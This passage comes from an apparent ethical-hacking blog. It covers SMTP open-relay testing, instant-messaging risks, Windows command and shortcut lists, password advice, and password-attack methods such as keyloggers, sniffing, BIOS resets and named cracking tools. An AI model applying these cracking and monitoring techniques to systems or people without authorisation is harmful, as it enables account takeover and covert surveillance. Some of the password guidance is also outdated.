depends on whether you need to enable the VRFY and EXPN commands:

Disable VRFY and EXPN unless you need your remote systems to be able
to gather user and mailing-list information from your server.

If you need VRFY and EXPN functionality, check your e-mail server or
content filtering documentation for the ability to limit these commands
to specific hosts on your network or the Internet.

Relay
SMTP relay lets users send e-mails through external servers. Open e-mail
relays are one of the greatest problems on the Internet. Spammers and hackers
can use an e-mail server to send spam or attack through e-mail under the
guise of the unsuspecting open-relay owner.
Keep in mind the following key points when checking your e-mail system for
SMTP-relay weaknesses:

Test your e-mail server by using more than one tool or testing method.
Multiple tests minimize any errors or oversights.

Test for open relay from outside your network. If you test from the
inside, you may get a false positive, because outbound e-mail relaying
may be configured and necessary for your internal e-mail clients.

Automatic testing
Here are a couple of easy ways to test your server for SMTP relay:

Free online tools.
One of my online tools is located at www.abuse.net/relay.
html. You can perform the anonymous test without entering your e-mail
address — unless you’re an abuse.net member. It immediately displays
the test results in your browser.

Using EXPN
to verify that
a mailing list
exists.

Other Windows-based tools, such as Sam Spade for Windows.

Some SMTP servers accept inbound relay connections and make it look
like relaying works. This isn’t always the case, because the filtering may
take place behind the scenes. Check whether the e-mail actually made it
through by checking the account you sent the test relay message to.

Manual testing
You can manually test your server for SMTP relay by telnetting to the e-mail
server on port 25. Follow these steps:

1. Telnet to your server on port 25.
You can do this two ways:
• Use your favorite graphical telnet application, such as HyperTerminal
(which comes with Windows) or SecureCRT (www.vandyke.com).

• Enter the following command at a Windows or UNIX command
prompt:
telnet mailserver_address 25
To see what’s entered, you may have to enable local echoing of characters
in your telnet program, such as Hyper Terminal.
You should see the SMTP welcome banner when the connection is made.

2. Enter a command to tell the server, “Hi, I’m connecting from this
domain.” Enter the command like this:
helo yourdomain.com
After each command in these steps, you should receive a differentnumbered
message, like 999 OK. You can ignore these messages.

3. Enter a command to tell the server your e-mail address, like this:
mail from:yourname@yourdomain.com

4. Enter a command to tell the server who to send the e-mail to, like this:
rcpt to:yourname@yourdomain.com

5. Enter a command to tell the server that the message body is to follow,
like this:
data

6. Enter the following text as the body of the message:
A relay test

7. End the command with a period on a line by itself.
This marks the end of the message. After you enter this final period,
your message will be sent if relaying is allowed.

8. Check for relaying on your server:
• Look for a message like Relay not allowed to come back from the
server.
If you get a message like this returned, SMTP relaying is not
allowed on your server.

You may get this message after you enter the rcpt to: command.
• If you don’t receive a message back from your server, check your
inbox for the relayed e-mail.
If you receive the test e-mail you sent, SMTP relaying is enabled on
your server.

Countermeasures
You can implement the following countermeasures on your e-mail server to
disable or at least control SMTP relaying:

Disable SMTP relay on your e-mail server. If you don’t know whether you
need SMTP relay, you probably don’t. You can enable SMTP relay for
specific hosts if needed.
www.mailabuse.org/tsi/ar-fix.html provides information on disabling
SMTP relay on e-mail servers.

Enforce authentication, if your e-mail server allows it. You may be able
to require such authentication methods as password authentication or
an e-mail address that matches the e-mail server’s domain. Check your
e-mail server and client documentation for details on setting up this
type of authentication.

Instant Messaging

The hottest new technology taking networks by storm is instant messaging
(IM). Although IM offers a lot of business value, some serious security issues
are associated with it. This is especially true if it’s not managed properly and
end users are free to install, configure, and use it in any way they want.

Vulnerabilities

IM has several critical security vulnerabilities, including the following:

Name hijacking, allowing a hacker to assume the identity of an IM user

Launching a DoS attack on an IM client, allowing the attacker to take
remote control of the computer

Capturing internal IP address information (similar to the way it’s disclosed
in e-mail headers)

Transferring malware, including viruses and malicious Trojan horses

You can remedy most of these vulnerabilities by applying the latest software
patches and keeping antivirus signatures up to date. However, two IM vulnerabilities
are susceptible to malicious attack, so they deserve a little more discussion.
These affect most of the popular IM clients, including AOL Instant
Messenger (AIM) and ICQ. These vulnerabilities are just problems with file
sharing and log files, but these weaknesses can make all the difference in the
world when it comes to securing your network.

Sharing network drives
The biggest problem with IM clients is the ability to share files. This feature
may be pretty neat for home users or others with stand-alone computers, but
it can pose a real security risk to your network and information. Practically
every IM client gives users the ability to share both local and network files.
Once untrained or careless users share your network drives via their IM
clients, they’ve just granted potentially anyone on their IM network permission
to view and copy those files.

If you know of IM users on your network, follow these steps to assess the
security of their software and configuration:
1. Determine IM clients that are running on your network.
You can detect IM software with
• Manual inspection of the local workstation
• A third-party workstation hardware and software inventory
program
• A network analyzer that shows IM traffic. For instance, you can use
Ethereal to capture and display various types of IM protocols, such
as AOL Instant Messenger (AIM protocol), ICQ (ICQ protocol), and
MSNMS (MSN Messenger).
2. Install the IM clients on your own system.
Avoid creating your own security holes: Download and install the latest
client versions, and don’t enable file sharing.
3. Find your network’s IM users.
You can identify IM users by either looking up users with a directory
search in the IM client (many IM clients publish this information by
default) or asking users for their handles for all their IM clients.
4. For each user, check settings to see whether they’re sharing files.
It’s often just a simple right-click on their IM handle within the IM software
to copy files to and from their system.

Log files
Many IM clients can log all IM conversations. Some clients log all conversations
by default. Have users enabled logging and inadvertently shared their
log files with the world? It’s a smoking gun for a hacker to use! Figure 15-13
shows part of an ICQ conversation stored in communications gobbledygook
in a log file found in the c:\Program Files\ICQ folder.

Countermeasures
IM vulnerabilities can be difficult to detect, because most rogue IM software
is desktop-based. If you have a large network, checking every computer for
these vulnerabilities is pretty much impossible. Spot checks can be inaccurate,
because every desktop and every user can be different.
Even if you disallow IM — or any messaging software — on your network, users
always install it. If you implement these countermeasures, you’re better prepared
to protect your users from themselves and hackers.

Detecting IM traffic
In addition to a network analyzer, you can detect IM traffic by using the following
tools:

IM traffic-detection tools from Akonix (www.akonix.com) work like a
network analyzer.

Rogue Aware (www.akonix.com/products/rogueaware.asp) is a free
tool. Rogue Aware detects such traffic on the network as IM and other P2P communications (such as Kazaa and Gnutella) and file sharing on the network. I recommend that you check it
out and use this tool as part of your ethical hacking toolkit. Ideally, you
install it on a computer that’s connected to a monitor port on a switch
or a hub adjacent to your firewall to ensure that you see all the traffic.

Akonix’s Enforcer and L7 Enterprise are commercial utilities that have
more functionality. Other vendors offer similar solutions, such as FaceTime
Communications (www.facetime.com) and IM Logic (www.imlogic.com).
If you can justify the cost — which is relatively easy — I recommend that
you check these products out.

Desktop auditing utilities can show you which applications are installed
and their specific settings. Such products as Ecora’s Enterprise Auditor
(www.ecora.com/ecora/products/enterprise_auditor.asp),
Microsoft’s Systems Management Server (www.microsoft.com/
smserver/default.asp) and some lower-end shareware tools can
offer this type of functionality.

Maintenance and configuration
In addition to the tools listed in the previous section, you can implement
these IM hacking countermeasures:

User behavior:
• Have a policy banning or limiting the usage of all P2P software.
• Instruct users not to open file attachments or configure their IM
software to share or receive file attachments.
• Instruct users to keep their buddy lists private and not share their
information.

System configuration:
• Change default IM software installation directories to help eliminate
automated attacks.
• Apply all the latest IM software patches.
• Ensure that the latest antivirus software and personal-firewall software
is loaded on each instant-messaging client.
• Ensure that proper file and directory access controls are in place
to effectively give your users the minimum necessary rights for
their jobs. This countermeasure helps keep prying eyes out if
someone can exploit an IM vulnerability.
• If you allow IM on your network for business purposes, consider
standardizing an enterprise-based IM application such as Jabber or
Lotus Sametime. These applications have more-robust and manageable
security options, which can ensure control.

Must Read :--

Password cracking , decrypting , encrypting ..

Malwares , trojans , RATs etc ..

Shortcuts

2008-12-15T13:47:00.000-08:00

Run Commands
-----------------------------------------------------------
compmgmt.msc - computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt

Run Commands to access the control panel
-------------------------------------------------------------------
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts

Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl

printer Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl

Command Prompt
--------------------------------------------------------------
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original orgininal divice driver.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.

EXPAND Expand a Ms windows file back to it's original format.
EXTRACT Extract files from the Microsoft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.

FTP Command to connect and operate on a FTP server .
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early Microsoft virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

Windows XP Shortcuts
--------------------------------------------------------------
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items

Windows Explorer Shortcuts
-------------------------------------------------------------
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item

Internet explorer Shortcuts
--------------------------------------------------------------
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help

Firefox Shortcuts
--------------------------------------------------

Back	AltOpt+Left Arrow BackspaceAltOpt+Left Arrow CtrlCmd+[CtrlCmd+[ CtrlCmd+Left Arrow Delete
Forward	AltOpt+Right Arrow Shift+BackspaceAltOpt+Right Arrow CtrlCmd+]
Home	AltOpt+Home
Open File	CtrlCmd+O
Reload	F5 Ctrl Cmd+R
Reload (override cache)	CtrlCmd+F5 CtrlCmd+Shift+R
Stop	CtrlCmd+. Esc
Current Page
Go to Bottom of Page	End
Go to Top of Page	Home
Move to Next Frame	F6
Move to Previous Frame	Shift+F6
Page Info	CtrlCmd+I
Page Source	CtrlCmd+U
Print	CtrlCmd+P
Save Page As	CtrlCmd+S
Zoom In	CtrlCmd++
Zoom Out	CtrlCmd+-
Zoom Reset	CtrlCmd+0
Editing
Copy	CtrlCmd+C
Cut	CtrlCmd+X
Delete	Delete
Paste	CtrlCmd+V
Redo	CtrlCmd+YCtrlCmd+Shift+Z
Select All	CtrlCmd+A
Undo	CtrlCmd+Z
Search
Find	CtrlCmd+F
Find Again	F3 CtrlCmd+G
Find As You Type Link	'
Find As You Type Text	/
Find Previous	Shift+F3
Web Search	CtrlCmd+K CtrlCmd+E Ctrl Cmd+J
Windows & Tabs
Close Tab	CtrlCmd+W Ctrl+F4
Close Window	CtrlCmd+Shift+W AltOpt+F4
Move Tab Left (when tab is focused)	CtrlCmd+Left Arrow CtrlCmd+Up Arrow
Move Tab Right (when tab is focused)	CtrlCmd+Right Arrow CtrlCmd+Down Arrow
Move Tab to Beginning (when tab is focused)	Ctrl Cmd+Home
Move Tab to End (when tab is focused)	CtrlCmd+End
New Tab	CtrlCmd+T
New Window	CtrlCmd+N
Next Tab	Ctrl+Tab CtrlCmd+AltOpt+Right Arrow Cmd+} Ctrl+Page Down
Open Address in New Tab (from Location Bar or Search Bar)	AltOpt+EnterReturn
Previous Tab	Ctrl+Shift+Tab CtrlCmd+AltOpt+Left Arrow Cmd+{ Ctrl+Page Up
Undo Close Tab	CtrlCmd+Shift+T
Select Tab (1 to 8)	CtrlCmdAltOpt+(1 to 8)
Select Last Tab	CtrlCmdAltOpt+9
Tools
Bookmark All Tabs	CtrlCmd+Shift+D
Bookmark This Page	CtrlCmd+D
Bookmarks	CtrlCmd+B CtrlCmd+I
Caret Browsing	F7
Downloads	CtrlCmd+JCtrlCmd+Y
History	CtrlCmd+H CtrlCmd+Shift+H
Clear Private Data	CtrlCmd+Shift+Del
Error Console	CtrlCmd+Shift+J
Miscellaneous
Complete .com Address	CtrlCmd+EnterReturn
Complete .net Address	Shift+EnterReturn
Complete .org Address	CtrlCmd+Shift+EnterReturn
Delete Selected Autocomplete Entry	DelShift+Del
Full Screen	F11
Select Location Bar	Alt+DF6 CtrlCmd+L
Select or Manage Search Engines (when Search Bar is focused)	AltOpt+Up Arrow AltOpt+Down Arrow F4

All About Passwords (cracking , countermeasures)

2008-12-15T07:15:00.000-08:00

Password hacking is one of the easiest and most common ways hackers
obtain unauthorized computer or network access. Although strong passwords
that are difficult to crack (or guess) are easy to create and maintain,
users often neglect this. Therefore, passwords are one of the weakest links in
the information-security chain. Passwords rely on secrecy. After a password
is compromised, its original owner isn’t the only person who can access the
system with it. That’s when bad things start happening.

Hackers have many ways to obtain passwords. They can glean passwords
simply by asking for them or by looking over the shoulders of users as they
type them in. Hackers can also obtain passwords from local computers by
using password-cracking software. To obtain passwords from across a network,
hackers can use remote cracking utilities or network analyzers.

Password Vulnerabilities

Here are the two general classifications of password vulnerabilities:

Organizational or end-user vulnerabilities: This includes lack of password
awareness on the part of end users and the lack of password policies
that are enforced within the organization.

Technical vulnerabilities: This includes weak encryption methods and
insecure storage of passwords on computer systems.

Organizational password vulnerabilities

It’s human nature to want convenience. This makes passwords one of the easiest
barriers for an attacker to overcome. Almost 3 trillion (yes, trillion with a
t and 12 zeros) eight-character password combinations are possible by using
the 26 letters of the alphabet and the numerals 0 through 9. However, most
people prefer to create passwords that are easy to remember. Users like to
use such passwords as “password,” their login name, or a pet’s name.
Unless users are educated and reminded about using strong passwords, their
passwords usually are

Weak and easy to guess.

Seldom changed.

Reused for many security points. When bad guys crack a password, they
try to access other systems with the same password and user name.

Written down in nonsecure places. The more complex a password is, the
more difficult it is to crack. However, when users create more complex
passwords, they’re more likely to write them down. Hackers can find
these passwords and use them against you.

How to choose good password .

Technical password vulnerabilities

You can often find these serious technical vulnerabilities after exploiting
organizational password vulnerabilities:

Weak password-encryption schemes. Hackers can break weak password
storage mechanisms by using cracking methods that I outline in this
chapter. Many vendors and developers believe that passwords are safe
from hackers if they don’t publish the source code for their encryption
algorithms. Wrong! A persistent, patient hacker can usually crack this
security by obscurity fairly quickly. After the code is cracked, it is soon
distributed across the Internet and becomes public knowledge.
Password-cracking utilities take advantage of weak password encryption.
These utilities do the grunt work and can crack any password, given
enough time and computing power.

Software that stores passwords in memory and easily accessed databases.

End-user applications that display passwords on the screen while typing.

The ICAT Metabase (an index of computer vulnerabilities) currently identifies
over 460 technical password vulnerabilities, 230 of which are labeled as highseverity.
You can search for some of these issues at icat.nist.gov/icat.
cfm to find out how vulnerable some of your systems are from a technical
perspective.

For more about cracking password click next page.

Next page ---->

How To choose a good password

2008-12-15T07:09:00.000-08:00

What Not to choose

Here are some of the types of passwords that will be picked up by our crackers:

Words in the dictionary.
Words in any dictionary.
Your user name.
Your real name.
Your spouse's name.
Anyone's name (crackers don't necessarily know that your aunt's middle name is Agnes, but it's easy enough to get a list of 100,000 names and try each one).
Any word in any ``cracking dictionary.'' There are lists of words that crackers use to try to crack passwords: passwords that a lot of people use. Some of these lists include:
Abbreviations, Asteroids, Biology, Cartoons, Character Patterns, Machine names, famous names, female names, Bible, male names, Movies, Myths-legends, Number Patterns, Short Phrases, Places, Science Fiction, Shakespeare, Songs, Sports, Surnames
Any of the above, with a single character before or after it (``8dinner'', ``happy1'').
Any of the above, capitalized (``bat'' --> ``Bat'')
Any of the above, reversed (``bat'' --> ``tab''), doubled (``bat'' --> ``batbat'') or mirrored (``bat'' --> ``battab'').
We used to tell people that taking a word and substituting some characters (a 0 (zero) for an o, or a 1 for an l) made a good password. This is no longer the case. New crackers have the capability to crack things like this, in certain situations.
Words like ``foobar'', ``xyzzy'' and ``qwerty'' are still just plain words. They are also popular passwords, and the crack programs look for them. Avoid them.
Any of the sample passwords, good or bad, mentioned in this document.

How to Choose a Good Password

Choose a password that is at least six characters long. This should be long enough to discourage a brute-force attack. Currently, the maximum password length on many Unix systems is eight characters, but if you want to add a few more characters to make it easier to remember, go ahead. Just bear in mind that anything after the eighth character will be ignored (so ``abnormalbrain'' is the same as ``abnormal'').
In general, a good password will have a mix of lower- and upper-case characters, numbers, and punctuation marks, and should be at least 6 characters long. Unfortunately, passwords like this are often hard to remember and result in people writing them down. Do not write your passwords down!
The license plate rule: take a phrase and try to squeeze it into eight characters, as if you wanted to put it on a vanity license plate.
Some people like to pick several small words, separated by punctuation marks of some kind.
Put a punctuation mark in the middle of a word, e.g., ``vege%tarian''.
Use some unusual way of contracting a word. You don't have to use an apostrophe.
One of my favorite passwords was ``kEp*-h&y'': ``kEp'' --> ``keep'', ``*-'' --> ``laser'' (like those signs that you see outside of physics labs), and ``h&y'' --> ``handy''; ``Keep your laser handy!''
You can use control characters. Just bear in mind that a lot of them have special meanings. If you use ^D, ^H or ^U, for example, you might not be able to log in again.
Think of an uncommon phrase, and take the first, second or last letter of each word. ``You can't always get what you want'' would yield ``ycagwyw''. Throw in a capital letter and a puntuation mark or a number or two, and you can end up with ``yCag5wyw''.
Deliberately misspelling one or more words can make your password harder to crack.
Use several of the techniques above.
Something that no one but you would ever think of. The best password is one that is totally random to anyone else except you. It is difficult to tell you how to come up with these, but people are able to do it. Use your imagination!

About Password cracking read this article .

Other Password Crackinh tools

2008-12-15T06:57:00.000-08:00

Keystroke logging

logging — the use of software or hardware to record keystrokes as they’re
being typed into the computer.

Be careful with keystroke logging. Even with good intentions, monitoring
employees can raise some legal issues. Discuss what you’ll be doing with
your legal counsel, and get approval from upper management.

Logging tools
With keystroke-logging tools, you can later assess the log files of your application
to see what passwords people are using:

Keystroke-logging applications can be installed on the monitored computer.
I recommend that you check out eBlaster and Spector Pro by
SpectorSoft (www.spectorsoft.com). Another popular tool that you
can use is Invisible KeyLogger Stealth, at www.amecisco.com/iks.htm,
as well as the hardware-based KeyGhost (www.keyghost.com). Dozens
of other such tools are available on the Internet.

Hardware-based tools fit between the keyboard and the computer or
replace the keyboard altogether.

A shared computer can capture the passwords of every user who logs in.

Countermeasures
The best defense against the installation of keystroke-logging software on
your systems is a spyware-detection program or popular antivirus products.

The potential for hackers to install keystroke-logging software is another
reason to ensure that your users aren’t downloading and installing random
shareware or opening attachments in unsolicited e-mails. Consider locking
down your desktops by setting the appropriate user rights through local or
group security policy in Windows. Alternatively, you could use a commercial
lock-down program, such as Fortres 101 (www.fortres.com) for Windows or
Deep Freeze (www.deepfreezeusa.com) for Windows and Mac OS X.

Weak password storage

Many legacy and stand-alone applications such as e-mail, dial-up network
connections, and accounting software store passwords locally, making them
vulnerable to password hacking. By performing a basic text search, I’ve found
passwords stored in clear text on the local hard drives of machines.

Searching
You can try using your favorite text-searching utility — such as the Windows
search function, findstr, or grep — to search for password or passwd on your
drives. You may be shocked to find what’s on your systems. Some programs
even write passwords to disk or leave them stored in memory.
This is a hacker’s dream. Head it off if you can.

Countermeasures
The only reliable way to eliminate weak password storage is to use only applications
that store passwords securely. This may not be practical, but it’s your
only guarantee that your passwords are secure.
Before upgrading applications, contact your software vendor or search for a
third-party solution.

Network analyzer

A network analyzer sniffs the packets traversing the network. This is what the
bad guys do if they can gain control over a computer or gain physical network
access to set up their network analyzer. If they gain physical access, they can
look for a network jack on the wall and plug right in!

Although you can benefit from using a commercial network analyzer such as
EtherPeek, you don’t need to buy one for your testing. An open-source program,
Ethereal, runs on Windows and UNIX platforms. You can search for
password traffic on the network a million ways. For example, to capture POP3
password traffic, set up a trigger to search for the PASS command. When the
network analyzer sees the PASS command in the packet, it starts capturing
data until your specified time or number of packets.
Capture this data on a hub segment of your network, or plug your networkanalyzer
system into a monitor port on a switch. Otherwise, you can’t see
anyone else’s data traversing the network — just yours. Check your switch’s
user’s guide for whether it has a monitor or mirror port and instructions on
how to configure it. You can connect your network analyzer to a hub on the
public side of your firewall. You’ll capture only those packets that are entering
or leaving your network — not internal traffic.

For more how to use ettercap for password sniffing in network check out this video.

Countermeasures
Here are some good defenses against network-analyzer attacks:

Use switches on your network, not hubs.
If you must use hubs on network segments, a program such as sniffdet,
cpm, and sentinel can detect network cards in promiscuous mode
(accepting all packets, whether destined for it or not). Network cards in
this mode are signs of a network analyzer running on the network.

Don’t let a hacker gain physical access to your switches or the network
connection on the public side of your firewall. With physical access, a
hacker can connect to a switch monitor port, or tap into the unswitched
network segment outside the firewall and capture packets.
Switches do not provide complete security because they are vulnerable to
ARP poisoning attacks.

Most computer BIOSs allow power-on passwords and/or setup passwords to
protect the computer’s hardware settings that are stored in the CMOS chip.
Here are some ways around these passwords:

You can usually reset these passwords by either unplugging the CMOS
battery or changing a jumper on the motherboard.

Password-cracking utilities for BIOS passwords are available.
Some systems (especially laptops) can’t be reset easily. You can lose all the
hardware settings and lock yourself out of your own computer. If you plan to
hack your own BIOS passwords, check for information in your user manual or
on labmice.techtarget.com/articles/BIOS_hack.htm on doing this
safely.

Password-reset programs

Network administrators occasionally use administrator password-resetting
programs, which can be used against a network.

Tools
One of my favorites for Windows is NTAccess (www.mirider.com/ntaccess.
html). This program isn’t fancy, but it does the job.

Countermeasures
The best safeguard against a hacker using a password-reset program against
your systems is to ensure the hacker can’t gain physical access. When a
hacker has physical access, all bets are off.

More about this topic click here..

How to choose good password here..

High-tech password cracking

2008-12-15T06:44:00.000-08:00

High-tech password cracking involves using a program that tries to guess a
password by determining all possible password combinations. These hightech
methods are mostly automated after you access the computer and password
database files.

Password cracking software

You can try to crack your organization’s operating-system and Internetapplication
passwords with various password cracking tools:

LC4 (previously called L0phtcrack) can sniff out password hashes from
the wire. Go to www.atstake.com/research/lc

NetBIOS Auditing Tool (NAT) specializes in network-based password
attacks. Go to www.securityfocus.com/tools/543

Chknull (www.phreak.org/archives/exploits/novell) for Novell
NetWare password testing

These tools require physical access on the tested computer:

• John the Ripper (www.openwall.com/john)

• pwdump2 (razor.bindview.com/tools/desc/pwdump2_
readme.html)

• Crack (coast.cs.purdue.edu/pub/tools/unix/pwdutils/
crack)

• Brutus (www.hoobie.net/brutus)

• Pandora (www.nmrc.org/project/pandora)

